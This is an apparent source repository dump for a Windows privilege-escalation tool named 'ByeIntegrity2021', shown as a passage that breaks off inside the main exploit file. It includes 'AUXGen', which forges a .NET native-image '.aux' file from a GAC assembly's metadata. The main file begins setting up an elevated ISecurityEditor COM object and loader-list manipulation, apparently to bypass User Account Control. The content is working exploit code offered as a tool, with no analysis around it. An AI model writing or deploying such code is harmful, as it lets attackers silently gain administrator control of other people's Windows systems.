[ { "path": ".gitattributes", "content": "###############################################################################\n# Set default behavior to automatically normalize line endings.\n###############################################################################\n* text=auto\n\n###############################################################################\n# Set default behavior for command prompt diff.\n#\n# This is need for earlier builds of msysgit that does not have it on by\n# default for csharp files.\n# Note: This is only used by command line\n###############################################################################\n#*.cs diff=csharp\n\n###############################################################################\n# Set the merge driver for project and solution files\n#\n# Merging from the command prompt will add diff markers to the files if there\n# are conflicts (Merging from VS is not affected by the settings below, in VS\n# the diff markers are never inserted). Diff markers may cause the following \n# file extensions to fail to load in VS. An alternative would be to treat\n# these files as binary and thus will always conflict and require user\n# intervention with every merge. To do so, just uncomment the entries below\n###############################################################################\n#*.sln merge=binary\n#*.csproj merge=binary\n#*.vbproj merge=binary\n#*.vcxproj merge=binary\n#*.vcproj merge=binary\n#*.dbproj merge=binary\n#*.fsproj merge=binary\n#*.lsproj merge=binary\n#*.wixproj merge=binary\n#*.modelproj merge=binary\n#*.sqlproj merge=binary\n#*.wwaproj merge=binary\n\n###############################################################################\n# behavior for image files\n#\n# image files are treated as binary by default.\n###############################################################################\n#*.jpg binary\n#*.png binary\n#*.gif binary\n\n###############################################################################\n# diff behavior for common document formats\n# \n# Convert binary document formats to text before diffing them. This feature\n# is only available from the command line. Turn it on by uncommenting the \n# entries below.\n###############################################################################\n#*.doc diff=astextplain\n#*.DOC diff=astextplain\n#*.docx diff=astextplain\n#*.DOCX diff=astextplain\n#*.dot diff=astextplain\n#*.DOT diff=astextplain\n#*.pdf diff=astextplain\n#*.PDF diff=astextplain\n#*.rtf diff=astextplain\n#*.RTF diff=astextplain\n" }, { "path": ".gitignore", "content": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUNIT\n*.VisualState.xml\nTestResult.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# JustCode is a .NET coding add-in\n.JustCode\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- Backup*.rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# JetBrains Rider\n.idea/\n*.sln.iml\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb" }, { "path": "AUXGen/AUXGen.cpp", "content": "#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \nusing Microsoft::WRL::ComPtr;\n\ntemplate \ninline D AlignTo(D data)\n{\n\tauto mask{ static_cast(sizeof(T)) - 1 };\n\treturn (data + mask) & ~mask;\n}\n\n/* .NET CLR Runtime data structures and parsing information\n*\tInformation has been referenced from the following source:\n*\thttps://www.ecma-international.org/wp-content/uploads/ECMA-335_6th_edition_june_2012.pdf\n*/\n\ntypedef struct\n{\n\tULONG Signature;\n\tUSHORT MajorVersion;\n\tUSHORT MinorVersion;\n\tULONG Reserved;\n\tULONG Length;\n} METADATA_ROOT, * PMETADATA_ROOT;\n\ntypedef struct\n{\n\tULONG Offset;\n\tULONG Size;\n\tCHAR Name[ANYSIZE_ARRAY];\n} METADATA_STREAM_HEADER, * PMETADATA_STREAM_HEADER;\n\ntypedef struct\n{\n\tUSHORT Flags;\n\tUSHORT Streams;\n\tMETADATA_STREAM_HEADER StreamHeaders[ANYSIZE_ARRAY];\n} METADATA_ENDDATA, * PMETADATA_ENDDATA;\n\ntypedef struct\n{\n\tULONG Reserved0;\n\tBYTE MajorVersion;\n\tBYTE MinorVersion;\n\tBYTE HeapSizes;\n\tBYTE Reserved1;\n\tULONG64 Valid;\n\tULONG64 Sorted;\n\tULONG Rows[ANYSIZE_ARRAY];\n} LOGICAL_METADATA_STREAM, * PLOGICAL_METADATA_STREAM;\n\nint wmain(\n\tint argc,\n\tWCHAR* argv[]\n)\n{\n\tif (argc < 2)\n\t{\n\t\tstd::cout << \"Usage: AUXGen \\n\";\n\t\treturn 0;\n\t}\n\n\tPWSTR winDir;\n\tauto hr{ SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &winDir) };\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"SHGetKnownFolderPath() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\tstd::wstring path{ winDir };\n\tpath += L\"\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\\";\n\tCoTaskMemFree(winDir);\n\n\tstd::wstring currentDir;\n\tDWORD dirSize;\n\tif (!(dirSize = GetCurrentDirectoryW(0, nullptr)))\n\t{\n\t\tstd::wcout << L\"GetCurrentDirectoryW() (0) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\tcurrentDir.resize(dirSize);\n\tif (!(dirSize = GetCurrentDirectoryW(dirSize, ¤tDir[0])))\n\t{\n\t\tstd::wcout << L\"GetCurrentDirectoryW() (1) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tif (!SetCurrentDirectoryW(path.c_str()))\n\t{\n\t\tstd::wcout << \"SetCurrentDirectoryW() (0) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr asmEnum;\n\thr = CreateAssemblyEnum(&asmEnum, nullptr, nullptr, ASM_CACHE_GAC, nullptr);\n\tif (FAILED(hr))\n\t{\n\t\tstd::cout << \"CreateAssemblyEnum() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr asmCache;\n\thr = CreateAssemblyCache(&asmCache, 0);\n\tif (FAILED(hr))\n\t{\n\t\tstd::cout << \"CreateAssemblyCache() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr asmName;\n\tstd::wstring name;\n\twhile ((hr = asmEnum->GetNextAssembly(nullptr, &asmName, 0)) == S_OK)\n\t{\n\t\tDWORD nameSize{};\n\t\thr = asmName->GetName(&nameSize, nullptr);\n\t\tif (hr != 0x8007007a && FAILED(hr))\n\t\t{\n\t\t\tasmName->Finalize();\n\t\t\tstd::wcout << L\"IAssemblyName::GetName() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\t\treturn 1;\n\t\t}\n\n\t\tname.resize(nameSize - 1);\n\t\thr = asmName->GetName(&nameSize, &name[0]);\n\t\tif (FAILED(hr))\n\t\t{\n\t\t\tasmName->Finalize();\n\t\t\tstd::wcout << L\"IAssemblyName::GetName() (1) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\t\treturn 1;\n\t\t}\n\n\t\tif (wcscmp(argv[1], name.c_str()) == 0)\n\t\t\tbreak;\n\t\tasmName->Finalize();\n\t}\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyEnum::GetNextAssembly() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\tif (hr == S_FALSE)\n\t{\n\t\tstd::wcout << L\"'\" << argv[1] << L\"' not found in GAC\\n\";\n\t\treturn 0;\n\t}\n\n\tDWORD len{};\n\thr = asmName->GetDisplayName(nullptr, &len, 0);\n\tif (hr != 0x8007007a && FAILED(hr))\n\t{\n\t\tasmName->Finalize();\n\t\tstd::wcout << L\"IAssemblyName::GetDisplayName() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::wstring displayName;\n\tdisplayName.resize(len - 1);\n\thr = asmName->GetDisplayName(&displayName[0], &len, 0);\n\tasmName->Finalize();\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyName::GetDisplayName() (1) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tASSEMBLY_INFO asmInfo{};\n\tasmInfo.cbAssemblyInfo = sizeof ASSEMBLY_INFO;\n\thr = asmCache->QueryAssemblyInfo(0, name.c_str(), &asmInfo);\n\tif (hr != 0x8007007a && FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyCache::QueryAssemblyInfo() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::wstring asmPath;\n\tasmPath.resize(asmInfo.cchBuf - 1);\n\tasmInfo.pszCurrentAssemblyPathBuf = &asmPath[0];\n\thr = asmCache->QueryAssemblyInfo(0, name.c_str(), &asmInfo);\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyCache::QueryAssemblyInfo() (1) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\t/*\n\t * I would use the .NET unmanaged metadata COM interfaces to get the MVID,\n\t * however that requres .NET framework 3.5 which is not installed by default\n\t * on most systems, so instead I will manually parse the .NET directory of the\n\t * assembly and read the MVID that way.\n\t */\n\n\tstd::unique_ptr fileHandle{\n\t\tCreateFileW(asmInfo.pszCurrentAssemblyPathBuf, FILE_READ_ACCESS, FILE_SHARE_READ, nullptr, OPEN_EXISTING,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr),\n\t\tCloseHandle\n\t};\n\tif (fileHandle.get() == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::wcout << L\"CreateFileW() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::unique_ptr mapping{\n\t\tCreateFileMappingW(fileHandle.get(), nullptr, PAGE_READONLY | SEC_IMAGE_NO_EXECUTE, 0, 0, nullptr),\n\t\tCloseHandle\n\t};\n\tif (!mapping)\n\t{\n\t\tstd::wcout << L\"CreateFileMapping() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::unique_ptr file{\n\t\tMapViewOfFile(mapping.get(), FILE_MAP_READ, 0, 0, 0),\n\t\tUnmapViewOfFile\n\t};\n\tif (!file)\n\t{\n\t\tstd::wcout << L\"MapViewOfFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto corHeader{ reinterpret_cast(\n\t\treinterpret_cast(file.get()) +\n\t\treinterpret_cast(reinterpret_cast(file.get())\n\t\t\t+ reinterpret_cast(file.get())->e_lfanew)\n\t\t\t->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress\n\t\t) };\n\tauto metadataRoot{\n\t\treinterpret_cast(reinterpret_cast(file.get()) + corHeader->MetaData.VirtualAddress)\n\t};\n\tauto streamData{\n\t\treinterpret_cast(reinterpret_cast(metadataRoot)\n\t\t+ sizeof METADATA_ROOT + AlignTo(metadataRoot->Length))\n\t};\n\n\tPMETADATA_STREAM_HEADER streamHeader{ streamData->StreamHeaders }, metaStream{}, guidStream{}, stringStream{};\n\tbool foundStream{}, foundGuids{}, foundStrings{};\n\tfor (auto i = 1; i < streamData->Streams; ++i)\n\t{\n\t\tif (foundStream && foundGuids && foundStrings)\n\t\t\tbreak;\n\t\tif (strcmp(streamHeader->Name, \"#~\") == 0)\n\t\t{\n\t\t\tfoundStream = true;\n\t\t\tmetaStream = streamHeader;\n\t\t}\n\t\telse if (strcmp(streamHeader->Name, \"#GUID\") == 0)\n\t\t{\n\t\t\tfoundGuids = true;\n\t\t\tguidStream = streamHeader;\n\t\t}\n\t\telse if (strcmp(streamHeader->Name, \"#Strings\") == 0)\n\t\t{\n\t\t\tfoundStrings = true;\n\t\t\tstringStream = streamHeader;\n\t\t}\n\t\tstreamHeader = reinterpret_cast(\n\t\t\treinterpret_cast(streamHeader) + FIELD_OFFSET(METADATA_STREAM_HEADER, Name)\n\t\t\t+ AlignTo(strlen(streamHeader->Name) + 1));\n\t}\n\tif (!foundStream)\n\t{\n\t\tstd::wcout << L\"CLI #~ stream not found\\n\";\n\t\treturn 1;\n\t}\n\tif (!foundGuids)\n\t{\n\t\tstd::wcout << L\"CLI #GUID stream not found\\n\";\n\t\treturn 1;\n\t}\n\tif (!foundStrings)\n\t{\n\t\tstd::wcout << L\"CLI #Strings stream not found\\n\";\n\t\treturn 1;\n\t}\n\n\tauto logicalMetadata{\n\t\treinterpret_cast(reinterpret_cast(metadataRoot)\n\t\t+ metaStream->Offset)\n\t};\n\tstd::bitset<64> validBits{ logicalMetadata->Valid };\n\tstd::bitset<8> heapSizeBits{ logicalMetadata->HeapSizes };\n\n\tif (!validBits[0])\n\t{\n\t\tstd::wcout << L\"Module table does not seem to be present in metadata\\n\";\n\t\treturn 1;\n\t}\n\n\tif (logicalMetadata->Rows[0] > 1)\n\t\tstd::wcout << L\"More than one Module entry exists, using the first one\\n\";\n\n\tauto tables{\n\t\treinterpret_cast(logicalMetadata) + FIELD_OFFSET(LOGICAL_METADATA_STREAM, Rows)\n\t\t+ (validBits.count() * sizeof ULONG)\n\t};\n\n\tULONG mvidIndex, modNameIndex;\n\ttables += 2;\n\tif (heapSizeBits[0])\n\t{\n\t\tmodNameIndex = *reinterpret_cast(tables);\n\t\ttables += 4;\n\t}\n\telse\n\t{\n\t\tmodNameIndex = *reinterpret_cast(tables);\n\t\ttables += 2;\n\t}\n\tif (heapSizeBits[1])\n\t\tmvidIndex = *reinterpret_cast(tables);\n\telse\n\t\tmvidIndex = *reinterpret_cast(tables);\n\n\tauto guids{\n\t\treinterpret_cast(reinterpret_cast(metadataRoot) + guidStream->Offset)\n\t};\n\n\tstd::string modName{ reinterpret_cast(reinterpret_cast(metadataRoot)\n\t\t+ stringStream->Offset + modNameIndex) };\n\n\tauto extensionPos{ modName.find_last_of('.') };\n\tif (extensionPos != std::string::npos)\n\t\tmodName.insert(extensionPos, \".ni\");\n\telse\n\t\tmodName += \".ni\";\n\n\tmodName += \".aux\";\n\n\tif (!SetCurrentDirectoryW(currentDir.c_str()))\n\t{\n\t\tstd::wcout << L\"SetCurrentDirectoryW() (1) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto auxSize{ 100 + AlignTo(len) };\n\tauto auxData{ std::make_unique(auxSize) };\n\tauto dataPtr{ reinterpret_cast(auxData.get()) };\n\tstd::unique_ptr auxFile{\n\t\tCreateFileA(modName.c_str(), FILE_WRITE_ACCESS, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr),\n\t\tCloseHandle\n\t};\n\tif (auxFile.get() == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::wcout << L\"CreateFileA() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::string displayNameAnsi;\n\tdisplayNameAnsi.resize(len - 1);\n\tif (!WideCharToMultiByte(\n\t\tCP_ACP,\n\t\t0,\n\t\tdisplayName.c_str(),\n\t\tlen,\n\t\t&displayNameAnsi[0],\n\t\tstatic_cast(displayNameAnsi.capacity()),\n\t\tnullptr,\n\t\tnullptr\n\t))\n\t{\n\t\tstd::wcout << L\"WideCharToMultiByte() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\t*dataPtr++ = 0x5;\n\t*dataPtr++ = auxSize - 8;\n\t*dataPtr++ = 0xB;\n\t*dataPtr++ = auxSize - 16;\n\t*dataPtr++ = 0xD;\n\t*dataPtr++ = auxSize - 100;\n\tmemcpy(dataPtr, displayNameAnsi.c_str(), displayNameAnsi.length() + 1);\n\n\tauto delta{ (auxSize - 100) - (displayNameAnsi.length() + 1) };\n\tif (delta)\n\t{\n\t\tauto ptr{\n\t\t\treinterpret_cast(reinterpret_cast(dataPtr) + displayNameAnsi.length() + 1)\n\t\t};\n\t\tfor (auto i = 1; i <= delta; ++i)\n\t\t{\n\t\t\t*ptr++ = 0xCC;\n\t\t}\n\t}\n\n\tdataPtr = reinterpret_cast(reinterpret_cast(dataPtr) + delta + 1 + displayNameAnsi.length());\n\t*dataPtr++ = 0x7;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0x1109;\n\t*dataPtr++ = 0x2;\n\t*dataPtr++ = 0x8;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0xF;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0x10;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0x1;\n\t*dataPtr++ = 0x9;\n\t*dataPtr++ = 0x10;\n\tmemcpy(dataPtr, &guids[mvidIndex - 1], sizeof GUID);\n\n\tif (!WriteFile(auxFile.get(), auxData.get(), auxSize, &len, nullptr))\n\t{\n\t\tstd::wcout << L\"WriteFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto stdHandle{ GetStdHandle(STD_OUTPUT_HANDLE) };\n\n\tSetConsoleTextAttribute(stdHandle, 15);\n\n\tstd::wcout << L\"\\nAUX file\";\n\n\tSetConsoleTextAttribute(stdHandle, 14);\n\n\tstd::cout << \" '\" << modName << \"'\";\n\n\tSetConsoleTextAttribute(stdHandle, 15);\n\n\tstd::wcout << L\" generated successfully.\\n\";\n\n\tSetConsoleTextAttribute(stdHandle, 7);\n\n\treturn 0;\n}" }, { "path": "AUXGen/AUXGen.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n Win32Proj\n {b4192e53-737a-409e-96ab-7013f6863072}\n AUXGen\n 10.0\n \n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n false\n \n \n true\n \n \n false\n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n fusion.lib;%(AdditionalDependencies)\n fusion.dll\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n fusion.lib;%(AdditionalDependencies)\n fusion.dll\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n stdcpp17\n \n \n Console\n true\n fusion.lib;%(AdditionalDependencies)\n fusion.dll\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n fusion.lib;%(AdditionalDependencies)\n fusion.dll\n \n \n \n \n \n \n \n \n" }, { "path": "AUXGen/AUXGen.vcxproj.filters", "content": "\n\n \n \n \n" }, { "path": "ByeIntegrity2021/ByeIntegrity2021.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n Win32Proj\n {7cdc9c5f-6dee-4d33-a8ad-610194b1a017}\n ByeIntegrity2021\n 10.0\n \n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n false\n \n \n true\n \n \n false\n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n ntdll.lib;%(AdditionalDependencies)\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n ntdll.lib;%(AdditionalDependencies)\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n ntdll.lib;%(AdditionalDependencies)\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n ntdll.lib;%(AdditionalDependencies)\n \n \n \n \n \n \n \n \n" }, { "path": "ByeIntegrity2021/ByeIntegrity2021.vcxproj.filters", "content": "\n\n \n \n \n" }, { "path": "ByeIntegrity2021/byeintegrity2021.cpp", "content": "#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \nusing Microsoft::WRL::ComPtr;\n\nEXTERN_C IMAGE_DOS_HEADER __ImageBase;\n\n#define COUT_FAILED_HR(func, hr) (std::wcout << func << L\"() failed. HRESULT: 0x\" << std::hex << hr << std::endl)\n#define COUT_FAILED_WIN32(func, err) (std::wcout << func << L\"() failed. Error: \" << err << std::endl)\n\nconstexpr GUID IID_ISecurityEditor{ 0x14B2C619, 0xD07A, 0x46EF, {0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C} };\n\ntypedef struct\n{\n\tLIST_ENTRY InLoadOrderLinks;\n\tLIST_ENTRY InMemoryOrderLinks;\n\tLIST_ENTRY InInitializationOrderLinks;\n\tPVOID DllBase;\n\tPVOID EntryPoint;\n\tULONG SizeOfImage;\n\tUNICODE_STRING FullDllName;\n\tUNICODE_STRING BaseDllName;\n\t// more stuff underneath . . .\n} LDR_DATA_TABLE_ENTRY2, * PLDR_DATA_TABLE_ENTRY2;\n\nstruct ComSession\n{\n\tHRESULT Result;\n\tComSession() : Result(CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY))\n\t{}\n\t~ComSession()\n\t{\n\t\tif (SUCCEEDED(Result))\n\t\t\tCoUninitialize();\n\t}\n};\n\nstruct ISecurityEditor : IUnknown\n{\n\tvirtual HRESULT WINAPI GetSecurity(\n\t\tLPCOLESTR ObjectName,\n\t\tSE_OBJECT_TYPE ObjectType,\n\t\tSECURITY_INFORMATION SecurityInfo,\n\t\tLPCOLESTR* ppSDDLStr\n\t) = 0;\n\tvirtual HRESULT WINAPI SetSecurity(\n\t\tLPCOLESTR ObjectName,\n\t\tSE_OBJECT_TYPE ObjectType,\n\t\tSECURITY_INFORMATION SecurityInfo,\n\t\tLPCOLESTR pSDDLStr\n\t) = 0;\n};\n\nusing PLDR_ENUM_CALLBACK = VOID(NTAPI*)(PLDR_DATA_TABLE_ENTRY2 entry, PVOID context, PBOOLEAN stop);\n\nEXTERN_C NTSTATUS LdrEnumerateLoadedModules(ULONG flags, PLDR_ENUM_CALLBACK enumProc, PVOID context);\n\nint wmain()\n{\n\tauto hOutput{ GetStdHandle(STD_OUTPUT_HANDLE) };\n\tSetConsoleTextAttribute(hOutput, 8);\n\tstd::wcout << L\" __________ .___ __ .__ __ /\\\\________ ____ \\n\" \\\n\t\tL\" \\\\______ \\\\___.__. ____ | | _____/ |_ ____ ___________|__|/ |_ ___.__. )/\\\\_____ \\\\/_ |\\n\" \\\n\t\tL\" | | _< | |/ __ \\\\| |/ \\\\ __\\\\/ __ \\\\ / ___\\\\_ __ \\\\ \\\\ __< | | / ____/ | |\\n\" \\\n\t\tL\" | | \\\\\\\\___ \\\\ ___/| | | \\\\ | \\\\ ___// /_/ > | \\\\/ || | \\\\___ | / \\\\ | |\\n\" \\\n\t\tL\" |______ // ____|\\\\___ >___|___| /__| \\\\___ >___ /|__| |__||__| / ____| \\\\_______ \\\\|___|\\n\" \\\n\t\tL\" \\\\/ \\\\/ \\\\/ \\\\/ \\\\/_____/ \\\\/ \\\\/ \\n\\n\";\n\tSetConsoleTextAttribute(hOutput, 7);\n\n\tComSession comSession;\n\tif (FAILED(comSession.Result))\n\t{\n\t\tCOUT_FAILED_HR(L\"CoInitializeEx\", comSession.Result);\n\t\treturn 1;\n\t}\n\n\tPWSTR winPath;\n\tauto hr{ SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &winPath) };\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"SHGetKnownFolderPath\", hr);\n\t\treturn 1;\n\t}\n\tstd::wstring explorer{ winPath }, asmPath{ winPath 